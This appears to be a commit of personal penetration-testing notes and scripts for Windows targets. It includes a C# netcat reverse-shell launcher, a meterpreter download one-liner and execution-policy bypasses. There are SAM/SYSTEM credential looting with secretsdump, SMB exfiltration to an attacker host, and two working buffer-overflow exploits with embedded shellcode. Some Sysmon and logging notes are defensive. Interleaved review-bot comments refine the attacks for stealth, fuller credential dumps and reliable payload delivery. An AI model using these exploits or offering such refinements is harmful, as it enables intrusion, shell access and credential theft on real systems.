using System;
using System.Diagnostics;
namespace Wrapper {
class Program {
static void Main (){
Process proc = new Process();
ProcessStartInfo procInfo = new ProcessStartInfo("c:\\windows\\temp\\nc-mukaa.exe", "10.50.184.49 4447 -e cmd.exe");
proc.StartInfo = procInfo;
proc.Start();
}
}
}


@ -0,0 +1,93 @@
# Logging
* [Windows Logging CheatSheet](https://static1.squarespace.com/static/552092d5e4b0661088167e5c/t/580595db9f745688bc7477f6/1476761074992/Windows+Logging+Cheat+Sheet_ver_Oct_2016.pdf)
* [NSA -- Spotting Adversary with Windows Event Monitoring](https://apps.nsa.gov/iaarchive/library/reports/spotting-the-adversary-with-windows-event-log-monitoring.cfm)
* [Events to Monitor](https://docs.microsoft.com/en-us/windows-server/identity/ad-ds/plan/appendix-l--events-to-monitor)
* [Windows 10 Monitoring Reference](https://www.microsoft.com/en-us/download/confirmation.aspx?id=52630)
## Loglevel
|ID|Event Type|Description|
|--|----------|-----------|
|0|Error|An event that indicates a significant problem.|
|1|Warning|An event that is not necessarily significant.|
|2|Information|An event describing the successful operation of an application.|
|3|Success Audit|An event that records an audited security access attempt that is successful.|
|4|Failure Audit|An event that records an audited security access attempt that is failure.|
## Logrotation
```sh
C:\Windows\System32\winevt\Logs
```
* As an example, paths can be found under `Microsoft > Windows > PowerShell > Operational` and right click `Properties` in Event Viewer. Logs can be cleared as well in properties.
## Tools
* Event Viewer (GUI-based application)
* Wevtutil.exe (command-line tool)
* Get-WinEvent (PowerShell cmdlet)
### wevtutil.exe
```sh
wevtutil.exe /?
```
* Count logs
```sh
wevtutil.exe le | measure
```
* Read three most recent Application logs
```sh
wevtutil qe Application /c:3 /rd:true /f:text
```
### Get-WinEvent
* [Online help](https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.diagnostics/Get-WinEvent?view=powershell-7.1)
* List all the logs
```sh
Get-WinEvent -ListLog *
```
* Find string
```sh
Get-WinEvent -Path .\merged.evtx | Where-Object { $_.Message -like '*log clear*' }
```
* Further filtering
```sh
Get-WinEvent -LogName Application | Where-Object { $_.ProviderName -Match 'WLMS' }
```
```sh
Get-WinEvent -ListProvider *Policy*
```
```sh
(Get-WinEvent -ListProvider Microsoft-Windows-GroupPolicy).Events | Format-Table Id, Description
```
* Filter by hashtable values
```sh
Get-WinEvent -FilterHashtable @{ LogName='Application'; ProviderName='MsiInstaller' };
```
```sh
Get-WinEvent -FilterHashtable @{LogName='Microsoft-Windows-PowerShell/Operational'; ID=4104} | Select-Object -Property Message | Select-String -Pattern 'SecureString'
```
* Including __XPATH__
```sh
Get-WinEvent -LogName Application -FilterXPath '*/System/EventID=101 and */System/Provider[@Name="WLMS"]'
```
```sh
Get-WinEvent -LogName Security -FilterXPath '*/EventData/Data[@Name="TargetUserName"]="System"'
```
```sh
Get-WinEvent -LogName Application -FilterXPath '*/System/Provider[@Name="WLMS"] and */System/TimeCreated[@SystemTime="2020-12-15T01:09:08.940277500Z"]' -MaxEvents 1
```
* Find login by username
```sh
Get-WinEvent -LogName Security -FilterXPath '*/System/EventID=4720 and */EventData/Data[@Name="TargetUserName"]="sam"'
```
### Command Line Logging
* Enable PS Logging
```sh
Local Computer Policy > Computer Configuration > Administrative Templates > Windows Components > Windows PowerShell
```
* CLI Process Auditing -- ID 4688
```
Local Computer Policy > Computer Configuration > Administrative Templates > System > Audit Process Creation
```


@ -0,0 +1,18 @@
# Manual Windows Enumeration
* `whoami /priv`
* `whoami /groups`
* Looking for non-default services:
```sh
wmic service get name,displayname,pathname,startmode | findstr /v /i "C:\Windows"
```
* **Unquoted Service Path** Ideally there is a path without quotation
* Check which account the service the services run as
```sh
sc qc <ServiceName>
```
* Check if directory is writeable
```sh
powershell "get-acl -Path 'C:\Program Files (x86)\System Explorer' | format-list"
```


@ -0,0 +1,238 @@
# Powershell Usage
## Get-Help
```
Get-Help Command-Name
```
* Show examples
```
Get-Help Command-Name -Examples
```
* Get-Command gets all the cmdlets installed on the current Computer.
```
Get-Command
```
```
Get-Command Verb-*
Get-Command Invoke-*
Get-Command Get-*
```
## Passing Output via Pipe
* A pipe passes object including methods and attributes.
```
Verb-Noun | Get-Member
```
```
Get-Command | Get-Member -MemberType Method
```
## Creating Objects from Previous Cmdlets
```
Get-ChildItem | Select-Object -Property Mode, Name
```
* first - gets the first x object
* last - gets the last x object
* unique - shows the unique objects
* skip - skips x objects
## Filtering Objects
```
Verb-Noun | Where-Object -Property PropertyName -operator Value
Verb-Noun | Where-Object {$_.PropertyName -operator Value}
```
The second version uses the $_ operator to iterate through every object passed to the Where-Object cmdlet.
* Where -operator is a list of the following operators:
* -Contains: if any item in the property value is an exact match for the specified value
* -EQ: if the property value is the same as the specified value
* -GT: if the property value is greater than the specified value
## Sort Object
```
Verb-Noun | Sort-Object
```
```
Get-ChildItem | Sort-Object
```
## Finding a File
```
Get-ChildItem -Path C:\ -Recurse -Include *.txt -ErrorAction SilentlyContinue | Where-Object {$_.Name -match 'interesting-file'}
```
```sh
Get-HotFix | Format-list | findstr <searchstring>
```
## Showing File Content
```
Get-Content 'C:\Program Files\interesting-file.txt'
```
## Copy File Content
```sh
Copy-Item <sourcefile> <destfile>
```
## Count Lines of Output
As an example, count all cmdlets on the system
```
Get-Command | Where-Object CommandType -eq CmdLet | Measure-Object
```
## Checksum of File
```
Get-FileHash -Algorithm MD5 'C:\Program Files\interesting-file.txt'
```
## Current Working Directory
```
Get-Location
```
## File Metadata
```sh
ls | Format-List *
```
## Web Request
```sh
Invoke-Webrequest -Uri 'http://<attacker-ip> -OutFile <filename>
```
```sh
(New-Object System.Net.WebClient).DownloadFile("http://example.com/meterpreter.ps1", 'meterpreter.ps1')
```
## Base64 Decode File
```
[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String((Get-Content .\Desktop\b64.txt)))
```
## **Circumvent Execution-Policy**
```sh
powershell -ExecutionPolicy Bypass -File .\<file>
```
```sh
Set-ExecutionPolicy Bypass -Scope Process
```
## Enumeration
### Users
```
Get-LocalUser
```
* Password not required users
```
Get-LocalUser | Where-Object -Property PasswordRequired -Match false
```
* SID of users
```
Get-WmiObject win32_useraccount | Select name, sid
```
### Network intel
* IP Address
```
Get-NetIpAddress
```
* Listening TCP Ports
```
Get-NetTCPConnection | Where-Object -Property State -Match Listen | measure
```
* TCP Port by number
```
Get-NetTCPConnection | Where-Object -Property LocalPort -Match 443
```
### Patch level and updates
```
Get-Hotfix
```
* Find patch by HotFixID
```
Get-Hotfix | Where-Object -Property HotFixID -Match KB124284
```
### Find files and Content
* Find backup files
```
Get-ChildItem -Path C:\ -Recurse -Include *.bak* -ErroAction SilentlyContinue
```
* Find file contents
```
Get-ChildItem -Path C:\* -Recurse | Select-String -pattern API_KEY
```
### Processes
* Start processes
```sh
Start-Process <process>
```
* Running processes
```sh
Get-Process <process>
```
* Scheduled Tasks, by TaskName
```
Get-ScheduledTask | Where-Object -Property TaskName -Match taskname
```
or
```
Get-ScheduledTask -TaskName taskname
```
### Export Output
* Export as CSV
```sh
Get-Process <process> | Export-Csv <output.csv>
```
### ACL
* Owner of files
```
Get-ACL C:\
```
### Port Scanner
```
for($i=1; $i -le 65536; $i++) { Test-NetConnection localhost -Port $i}
```
### Ping Hosts
```sh
1..15 | %{echo "10.0.2.$_"; ping -n 1 10.0.2$_ | Select-String ttl}
```
### Using Powerview
```sh
Import-Module .\powerview.ps1
Get-NetDomainController
(Get-NetUser).name
Get-NetUser -properties description
Get-NetUser | select -ExpandProperty lastlogon
Get-NetComputer -ping
Get-NetGroupMember "Domain Admins"
Find-DomainShare -CheckShareAccess
```
* Enumerate Group Policy
```sh
Get-NetGPO
```
* Trust relationship to other domains
```sh
Get-NetDomainTrust
```
* User enumeration
```sh
Find-LocalAdminAccess
```
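Review bot: Several of the one-liners in this file fail as written: `Invoke-Webrequest -Uri 'http://<attacker-ip> -OutFile <filename>` never closes its quote, `-ErroAction SilentlyContinue` under "Find backup files" is a misspelled parameter that PowerShell rejects outright, and `ping -n 1 10.0.2$_` in the host sweep drops the dot before the last octet. The fixes are `Invoke-WebRequest -Uri 'http://<attacker-ip>/<file>' -OutFile <filename>`, `-ErrorAction SilentlyContinue`, and `ping -n 1 10.0.2.$_`. The port-scanner loop is also off by one (`$i -le 65536`; valid ports end at 65535) and `Test-NetConnection` pings and then waits out a timeout on every closed port, so even the corrected range takes hours — a `System.Net.Sockets.TcpClient` connect with a short timeout is the quieter and faster form when this is run on a target. The "Listening TCP Ports" line ends in `| measure`, which returns only a count rather than the listening ports the heading promises; drop it to get the list.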

@ -0,0 +1,97 @@
# Sysinternals and CLI usage
## Opening System Properties
```
sysdm.cpl
```
## Installing webdav server,
* Starting windows webclient service
```
get-service webclient
start-service webclient
```
* Opening NetworkAndSharingCenter
```
control.exe /name Microsoft.NetworkAndSharingCenter
```
## Make sure Network Discovery is enabled, advanced settings!
```
Install-WindowsFeature WebDAV-Redirector Restart
Get-WindowsFeature WebDAV-Redirector | Format-Table Autosize
```
## Sigcheck
Sigcheck is a command-line utility that shows file version number, timestamp information, and digital signature details, including certificate chains. It also includes an option to check a files status on VirusTotal, a site that performs automated file scanning against over 40 antivirus engines, and an option to upload a file for scanning.
* Check for unsigned files in `C:\Windows\system32`
```
sigcheck -u -e C:\Windows\System32
```
* `-u` "If VirusTotal check is enabled, show files that are unknown by VirusTotal or have non-zero detection, otherwise show only unsigned files."
* `-e` "Scan executable images only (regardless of their extension)"
## Alternate Data Stream (ADS)
By default, all data is stored in a file's main unnamed data stream, but by using the syntax 'file:stream', you are able to read and write to alternates. (official definition)
```
streams file.txt
notepad file.txt:<datastream_name>
or
Get-Content -Path .\file.txt -stream ads.txt
```
## SDelete
SDelete is a command line utility that takes a number of options. In any given use, it allows you to delete one or more files and/or directories, or to cleanse the free space on a logical disk.
## TCPView
TCPView provides a more informative and conveniently presented subset of the Netstat program that ships with Windows. The TCPView download includes Tcpvcon, a command-line version with the same functionality.
```
tcpview
tcpvcon
```
## Autoruns
Autoruns reports Explorer shell extensions, toolbars, browser helper objects, Winlogon notifications, auto-start services, and much more.
## Procdump
ProcDump is a command-line utility whose primary purpose is monitoring an application for CPU spikes and generating crash dumps during a spike that an administrator or developer can use to determine the cause of the spike.
## Procdump
The Process Explorer display consists of two sub-windows. The top window always shows a list of the currently active processes, including the names of their owning accounts, whereas the information displayed in the bottom window depends on the mode that Process Explorer is in: if it is in handle mode you'll see the handles that the process selected in the top window has opened; if Process Explorer is in DLL mode you'll see the DLLs and memory-mapped files that the process has loaded.
## Procmon
Process Monitor is an advanced monitoring tool for Windows that shows real-time file system, Registry and process/thread activity.
## Psexec
PsExec is a light-weight telnet-replacement that lets you execute processes on other systems, complete with full interactivity for console applications, without having to manually install client software. PsExec's most powerful uses include launching interactive command-prompts on remote systems and remote-enabling tools like IpConfig that otherwise do not have the ability to show information about remote systems
## Winobj
WinObj is a 32-bit Windows NT program that uses the native Windows NT API (provided by NTDLL.DLL) to access and display information on the NT Object Manager's name space.
## BGInfo
It automatically displays relevant information about a Windows computer on the desktop's background, such as the computer name, IP address, service pack version, and more
## RegJump
This little command-line applet takes a registry path and makes Regedit open to that path. It accepts root keys in standard (e.g. HKEY_LOCAL_MACHINE) and abbreviated form (e.g. HKLM).
```
regjump HKLM
```
* Similar to
```
reg query HKLM
```
Get-Item
Get-ItemProperty
```
## Strings
Strings just scans the file you pass it for UNICODE (or ASCII) strings of a default length of 3 or more UNICODE (or ASCII) characters.
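Review bot: Two commands will error as typed: `Install-WindowsFeature WebDAV-Redirector Restart` needs the switch form `-Restart` (a bare `Restart` is parsed as a second feature name), and `Format-Table Autosize` should be `Format-Table -AutoSize` (the bare word is taken as a property to display). The second `## Procdump` heading describes Process Explorer, not ProcDump, and should read `## Process Explorer (procexp)`; the `Get-Item` / `Get-ItemProperty` lines under RegJump also sit outside any fence because the block opened at `reg query HKLM` is closed one line too early. On the sigcheck example it is worth adding that `-u` only means "unsigned" unless `-vt` is given, that an unsigned binary in System32 is not by itself malicious and a validly signed one can still be, and that `-h` prints hashes for a threat-intel lookup. A sentence on PsExec's footprint belongs here too: it copies `PSEXESVC.exe` to `ADMIN$` and registers a service, so it is loud on the target (service-install events, which the Sysmon notes in this commit are meant to catch).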

@ -0,0 +1,63 @@
# Sysmon
Sysmon gathers detailed and high-quality logs as well as event tracing that assists in identifying anomalies in your environment. Sysmon is most commonly used in conjunction with security information and event management (SIEM) system or other log parsing solutions that aggregate, filter, and visualize events.
## Paths
* Logfiles
```
Applications and Services Logs/Microsoft/Windows/Sysmon/Operational
```
## Configuration
* [SwiftOnSecurity](https://github.com/SwiftOnSecurity/sysmon-config)
* [ION-Storm](https://github.com/ion-storm/sysmon-config/blob/develop/sysmonconfig-export.xml)
## Installation
```sh
Downloads-SysInternalsTools C:\Sysinternals
```
## Best Practices
* Exclude, not include events
* CLI gives further control over filters
```sh
Get-WinEvent
```
```sh
wevutil.exe
```
* Know the env before implementation
## Filtering Events
* Actions -> Filter Current Log
### Filtering Events with Powershell
* Logged Events containing port 4444
```sh
Get-WinEvent -Path <Path to Log> -FilterXPath '*/System/EventID=3 and */EventData/Data[@Name="DestinationPort"] and */EventData/Data=4444'
```
* Logged Events containing lsass.exe
```sh
Get-WinEvent -Path <Path to Log> -FilterXPath '*/System/EventID=10 and */EventData/Data[@Name="TargetImage"] and */EventData/Data="C:\Windows\system32\lsass.exe"'
```
* Rats and C2
```sh
Get-WinEvent -Path <Path to Log> -FilterXPath '*/System/EventID=3 and */EventData/Data[@Name="DestinationPort"] and */EventData/Data=<Port>'
```
## Evasion Techniques
* Alternate Data Streams
* Injections
* Masquerading
* Packing/Compression
* Recompiling
* Obfuscation
* Anti-Reversing Techniques
* Remote Thread (OpenThread, ResumeThread)
### Detecting Evasion Techniques with Powershell
```sh
Get-WinEvent -Path <Path to Log> -FilterXPath '*/System/EventID=15'
Get-WinEvent -Path <Path to Log> -FilterXPath '*/System/EventID=8'
```
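Review bot: The XPath filters in "Filtering Events with Powershell" do not do what their headings say: `*/EventData/Data[@Name="DestinationPort"] and */EventData/Data=4444` matches any event that has a DestinationPort field and *any* Data field equal to 4444 (a process id, a source port, ...), because the two predicates are evaluated independently. Bind the value to the named field, `*/System/EventID=3 and */EventData/Data[@Name="DestinationPort"]=4444`, and likewise `*/System/EventID=10 and */EventData/Data[@Name="TargetImage"]="C:\Windows\system32\lsass.exe"` for the lsass example. `wevutil.exe` is a typo for `wevtutil.exe`. `Downloads-SysInternalsTools C:\Sysinternals` looks like a lab-specific helper rather than a Sysmon install step; the actual installation is `sysmon64.exe -accepteula -i <sysmonconfig.xml>` with one of the configs linked above, and a line saying that "exclude, not include" refers to the filtering style of those configs would make the best-practice bullet concrete.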

@ -0,0 +1,14 @@
# Loot Windows Credentials
```sh
reg.exe save HKLM\SAM sam.bak
```
```sh
reg.exe save HKLM\SYSTEM system.bak
```
* Exifiltrate and use impacket
```sh
examples/secretsdump.py -sam sam.bak -system system.bak LOCAL
```
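Review bot: The `reg save` steps need an elevated shell — `HKLM\SAM` and `HKLM\SYSTEM` are not readable by a standard user — and the file never says so, which is the first thing someone following it will hit; add "(requires Administrator)" to the heading. The dump also omits `HKLM\SECURITY`, so LSA secrets and cached domain logons are lost: add `reg.exe save HKLM\SECURITY security.bak` and pass it as `-security security.bak` to `secretsdump.py`. The saved hives are credential material in their own right; note that they should be removed from the target after exfiltration and handled like passwords on the attacker side. "Exifiltrate" is a typo for "Exfiltrate".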

@ -0,0 +1,29 @@
# Connect to Attacker SMB
## Attacker
* Impacket smbserver on attacker
```sh
sudo examples/smbserver.py share . -smb2support -username <user> -password <password>
```
## Target
* Connect to attacker smb
```sh
net use \\<attacker-IP>\share /User:<user> <Password>
```
* Save data to attacker's smb
```sh
move sam.bak \\<attacker-IP>\share\sam.bak
move system.bak \\<attacker-IP>\share\system.bak
```
* Disconnect
```sh
net use \\<attacker-IP>\share /del
```
## Workarounds
* System Error 1312. User credentials need a domain
```sh
/USER:domain\user
```
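Review bot: Putting `<Password>` on the `net use` command line hands the credential to whatever process-creation logging is on the target (4688 with command-line auditing, Sysmon Event 1, PowerShell transcripts — all of which the other notes in this commit show how to enable); prefer `net use \\<attacker-IP>\share * /User:<user>` so the password is prompted for, or at least say that it is exposed. `smbserver.py ... -password <password>` on the attacker side ends up in `ps` output and shell history for the same reason, so the credential should be a throwaway scoped to the engagement. It is worth stating why `-smb2support` is there: current Windows clients refuse SMB1 by default, so without it the `net use` simply fails. `move` (rather than `copy`) deletes the local `sam.bak`/`system.bak` after transfer, which is presumably intentional cleanup — a comment saying so would stop someone "fixing" it.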

@ -0,0 +1,8 @@
#!/usr/bin/env python3
from __future__ import print_function
listRem = "\\x0a".split("\\x")
for x in range(1, 256):
if "{:02x}".format(x) not in listRem:
print("\\x" + "{:02x}".format(x), end='')
print()
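Review bot: `listRem = "\\x0a".split("\\x")` evaluates to `['', '0a']`, so the exclusion list is produced by a string split the reader has to simulate, and the fact that `\x00` is skipped only because `range` starts at 1 is invisible. Write the intent as data: `excluded = {"00", "0a"}` and `for x in range(256): if f"{x:02x}" not in excluded:` — same output, and adding a newly found bad character is a one-token edit. The `from __future__ import print_function` line is a no-op under the python3 shebang and can go.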

@ -0,0 +1,65 @@
import sys
import socket
badchars = bytearray()
listRem = [0x00]
for x in range(1, 256):
if x not in listRem:
badchars.append(x)
buf = b""
buf += b"\xdd\xc0\xd9\x74\x24\xf4\xbe\xd0\xdb\x95\xa8\x5d\x29"
buf += b"\xc9\xb1\x52\x31\x75\x17\x83\xc5\x04\x03\xa5\xc8\x77"
buf += b"\x5d\xb9\x07\xf5\x9e\x41\xd8\x9a\x17\xa4\xe9\x9a\x4c"
buf += b"\xad\x5a\x2b\x06\xe3\x56\xc0\x4a\x17\xec\xa4\x42\x18"
buf += b"\x45\x02\xb5\x17\x56\x3f\x85\x36\xd4\x42\xda\x98\xe5"
buf += b"\x8c\x2f\xd9\x22\xf0\xc2\x8b\xfb\x7e\x70\x3b\x8f\xcb"
buf += b"\x49\xb0\xc3\xda\xc9\x25\x93\xdd\xf8\xf8\xaf\x87\xda"
buf += b"\xfb\x7c\xbc\x52\xe3\x61\xf9\x2d\x98\x52\x75\xac\x48"
buf += b"\xab\x76\x03\xb5\x03\x85\x5d\xf2\xa4\x76\x28\x0a\xd7"
buf += b"\x0b\x2b\xc9\xa5\xd7\xbe\xc9\x0e\x93\x19\x35\xae\x70"
buf += b"\xff\xbe\xbc\x3d\x8b\x98\xa0\xc0\x58\x93\xdd\x49\x5f"
buf += b"\x73\x54\x09\x44\x57\x3c\xc9\xe5\xce\x98\xbc\x1a\x10"
buf += b"\x43\x60\xbf\x5b\x6e\x75\xb2\x06\xe7\xba\xff\xb8\xf7"
buf += b"\xd4\x88\xcb\xc5\x7b\x23\x43\x66\xf3\xed\x94\x89\x2e"
buf += b"\x49\x0a\x74\xd1\xaa\x03\xb3\x85\xfa\x3b\x12\xa6\x90"
buf += b"\xbb\x9b\x73\x36\xeb\x33\x2c\xf7\x5b\xf4\x9c\x9f\xb1"
buf += b"\xfb\xc3\x80\xba\xd1\x6b\x2a\x41\xb2\x99\xa2\x4e\x83"
buf += b"\xf6\xb6\x50\x12\x5b\x3e\xb6\x7e\x73\x16\x61\x17\xea"
buf += b"\x33\xf9\x86\xf3\xe9\x84\x89\x78\x1e\x79\x47\x89\x6b"
buf += b"\x69\x30\x79\x26\xd3\x97\x86\x9c\x7b\x7b\x14\x7b\x7b"
buf += b"\xf2\x05\xd4\x2c\x53\xfb\x2d\xb8\x49\xa2\x87\xde\x93"
buf += b"\x32\xef\x5a\x48\x87\xee\x63\x1d\xb3\xd4\x73\xdb\x3c"
buf += b"\x51\x27\xb3\x6a\x0f\x91\x75\xc5\xe1\x4b\x2c\xba\xab"
buf += b"\x1b\xa9\xf0\x6b\x5d\xb6\xdc\x1d\x81\x07\x89\x5b\xbe"
buf += b"\xa8\x5d\x6c\xc7\xd4\xfd\x93\x12\x5d\x1d\x76\xb6\xa8"
buf += b"\xb6\x2f\x53\x11\xdb\xcf\x8e\x56\xe2\x53\x3a\x27\x11"
buf += b"\x4b\x4f\x22\x5d\xcb\xbc\x5e\xce\xbe\xc2\xcd\xef\xea"
ip = "10.10.143.77"
port = 9999
offset = 2012
overflow = b"A" * offset
retn = b"\xdf\x14\x50\x62" #"BBBB"
padding = b"\x90" * 16
payload = buf
postfix = b""
buffer = overflow + retn + padding + payload + postfix
try:
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect((ip, port))
s.recv(2000)
s.send(b"pwnbot")
s.recv(2000)
print("Sending evil buffer...")
s.send(buffer)
print("Done!")
s.close()
except socket.error:
print("Could not connect: "+socket.error)
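Review bot: The error path is itself broken: `print("Could not connect: "+socket.error)` concatenates a string with the exception *class* and raises `TypeError`, so a refused connection ends in a traceback about the print rather than the message — catch the instance, `except socket.error as e: print(f"Could not connect: {e}")`. `badchars` is built at the top and never used; either drop it or send it in place of `buf` for the bad-character stage the accompanying README describes. `s.send(buffer)` may write fewer bytes than the ~2.3 KB payload on a busy socket and `s.recv(2000)` has no timeout, so `s.sendall(buffer)` and `s.settimeout(5)` before `connect` make the run deterministic. The hard-coded `ip`, `offset` and `retn` are specific to one target and one module build, which is fine for a worked example but worth a comment so the return address is not reused blindly.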

@ -0,0 +1,54 @@
#!/usr/bin/env python3
import socket
ip = "10.10.122.155"
port = 31337
prefix = ""
offset = 146
overflow = "A" * offset
# EIP return
#retn = "BBBB"
retn = "\xc3\x14\x04\x08"
padding = "\x90" * 16
#padding = ""
#payload = ""
payload = "\xd9\xc8\xbb\xbb\x5e\x64\xef\xd9\x74\x24\xf4\x58\x33\xc9\xb1"
payload += "\x52\x83\xc0\x04\x31\x58\x13\x03\xe3\x4d\x86\x1a\xef\x9a\xc4"
payload += "\xe5\x0f\x5b\xa9\x6c\xea\x6a\xe9\x0b\x7f\xdc\xd9\x58\x2d\xd1"
payload += "\x92\x0d\xc5\x62\xd6\x99\xea\xc3\x5d\xfc\xc5\xd4\xce\x3c\x44"
payload += "\x57\x0d\x11\xa6\x66\xde\x64\xa7\xaf\x03\x84\xf5\x78\x4f\x3b"
payload += "\xe9\x0d\x05\x80\x82\x5e\x8b\x80\x77\x16\xaa\xa1\x26\x2c\xf5"
payload += "\x61\xc9\xe1\x8d\x2b\xd1\xe6\xa8\xe2\x6a\xdc\x47\xf5\xba\x2c"
payload += "\xa7\x5a\x83\x80\x5a\xa2\xc4\x27\x85\xd1\x3c\x54\x38\xe2\xfb"
payload += "\x26\xe6\x67\x1f\x80\x6d\xdf\xfb\x30\xa1\x86\x88\x3f\x0e\xcc"
payload += "\xd6\x23\x91\x01\x6d\x5f\x1a\xa4\xa1\xe9\x58\x83\x65\xb1\x3b"
payload += "\xaa\x3c\x1f\xed\xd3\x5e\xc0\x52\x76\x15\xed\x87\x0b\x74\x7a"
payload += "\x6b\x26\x86\x7a\xe3\x31\xf5\x48\xac\xe9\x91\xe0\x25\x34\x66"
payload += "\x06\x1c\x80\xf8\xf9\x9f\xf1\xd1\x3d\xcb\xa1\x49\x97\x74\x2a"
payload += "\x89\x18\xa1\xfd\xd9\xb6\x1a\xbe\x89\x76\xcb\x56\xc3\x78\x34"
payload += "\x46\xec\x52\x5d\xed\x17\x35\x68\xfb\x10\x04\x04\xf9\x1e\x97"
payload += "\x88\x74\xf8\xfd\x22\xd1\x53\x6a\xda\x78\x2f\x0b\x23\x57\x4a"
payload += "\x0b\xaf\x54\xab\xc2\x58\x10\xbf\xb3\xa8\x6f\x9d\x12\xb6\x45"
payload += "\x89\xf9\x25\x02\x49\x77\x56\x9d\x1e\xd0\xa8\xd4\xca\xcc\x93"
payload += "\x4e\xe8\x0c\x45\xa8\xa8\xca\xb6\x37\x31\x9e\x83\x13\x21\x66"
payload += "\x0b\x18\x15\x36\x5a\xf6\xc3\xf0\x34\xb8\xbd\xaa\xeb\x12\x29"
payload += "\x2a\xc0\xa4\x2f\x33\x0d\x53\xcf\x82\xf8\x22\xf0\x2b\x6d\xa3"
payload += "\x89\x51\x0d\x4c\x40\xd2\x3d\x07\xc8\x73\xd6\xce\x99\xc1\xbb"
payload += "\xf0\x74\x05\xc2\x72\x7c\xf6\x31\x6a\xf5\xf3\x7e\x2c\xe6\x89"
payload += "\xef\xd9\x08\x3d\x0f\xc8";
#payload = "\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff"
postfix = ""
buffer = prefix + overflow + retn + padding + payload + postfix
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
s.connect((ip, port))
print("[*] Sending buffer...")
s.send(bytes(buffer + "\r\n", "latin-1"))
print("Done!")
except:
print("Could not connect")
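Review bot: The bare `except:` around `connect`/`send` reports "Could not connect" for any failure at all, including a `KeyboardInterrupt` or a `TypeError` in the payload assembly, which hides the real reason during the bad-character iterations this script is meant to support; use `except OSError as e: print(f"Could not connect: {e}")`. The socket is never closed — wrap it in `with socket.socket(...) as s:` as the fuzzer in this commit already does — and `s.send` should be `s.sendall` so a partial write cannot silently truncate the shellcode. A comment next to `retn = "\xc3\x14\x04\x08"` saying which module and which instruction (`jmp esp`) it points at would make the example reusable.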

@ -0,0 +1,52 @@
# amd64
* `rax` return value, caller saved.
* `r10`, `r11` are caller saved.
* `rbx`, `r12`, `r13`, `r14` are callee saved
* `rbp` is also callee saved(and can be optionally used as a frame pointer)
* `rsp` is callee saved
## Function argument registers
* `rdi`,`rsi`,`rdx`,`rcx`,`r8 `,`r9 `, called saved.
* Further function args are stored inside its stack frame.
## Overwriting Variables and Padding
* Overwrite an atomic variable behind a buffer
```C
int main ( int argc, char ** argv ) {
int var = 0
char buffer[12];
gets(buffer);
[...]
}
```
* Stack layout
```
Bottom
+------------------+
| Saved regsisters |
+------------------+
| int var |
+------------------+
| char buffer [11] |
| ... |
| ... |
| ... |
| char buffer [0] |
+------------------+
| char ** argv |
+------------------+
| char argc |
+------------------+
Top
```
* Watch out! I.e., a 12 byte array is padded to system memory allocation size.
```
+-------------+----+
|12 byte array| 4b |
+-------------+----+
0 12 16 byte
```
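Review bot: The register summary has two slips a reader will copy into their own notes: the argument registers `rdi, rsi, rdx, rcx, r8, r9` are *caller* saved, not "called saved", and `r15` is missing from the callee-saved set (`rbx, rbp, r12`–`r15` under the SysV ABI). In the stack diagram `char argc` should be `int argc`, and whether `var` really sits above `buffer` is compiler-dependent: GCC with `-fstack-protector` deliberately places arrays above scalars so a `gets` overflow hits the canary before `var`, so say "typical layout without stack protector". The "padded to 16" statement is likewise how GCC commonly aligns locals rather than a rule — "commonly" is the honest word.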

@ -0,0 +1,66 @@
# Buffer Overflow
* [Cheat Sheet](https://github.com/Tib3rius/Pentest-Cheatsheets/blob/master/exploits/buffer-overflows.rst)
# Usage
* Fuzz & crash the binary pretty roughly via payload
```sh
python -c "print('A' * 3000)
```
## Fuzzing
* python 3
../fuzzer.py
* python 2
../fuzzer2.py
## Measure Offset
* Use as payload
```sh
/opt/metasploit/tools/exploit/pattern_create.rb -l <bufferlength>
```
* Find content of the payload at EIP and identify exact bufferlength
```sh
/opt/metasploit/tools/exploit/pattern_offset.rb -l <bufferlength> -q <EIP-content>
```
```
msf-pattern_offset -l <bufferlength> -q <EIP>
```
```
mona msfpattern -l <bufferlength>
```
* Fill offset variable in exploit `buffer_overflow.py`
../buffer_overflow.py
* Execute buffer_overflow.py, EIP should contain `BBBB`
## Find bad characters to input in the buffer
* Execute `bad_chars.py` and include it as payload. Always excluded is `\x00`.
../bad_chars.py
* Compare stack if any bad chars block exectuion of the payload following in the next steps.
```sh
!mona bytearray -b "\x00"
!mona compare -f <path_to_bytearray.bin> -a <ESP>
```
## Find Jump Point / RoP
* Jump point to `ESP` (32 bit binary) needs to be found to put it inside `EIP`
### Example: Immunity Debugger using mona on windows machine
```sh
!mona modules
```
```sh
!mona jmp -r esp -m <exploitable_bin_from_modules>
```
* The found address needs to be **LITTLE ENDIAN NOTATION INSIDE THE EIP VARIABLE** if x86/amd64
## Shellcode as Payload
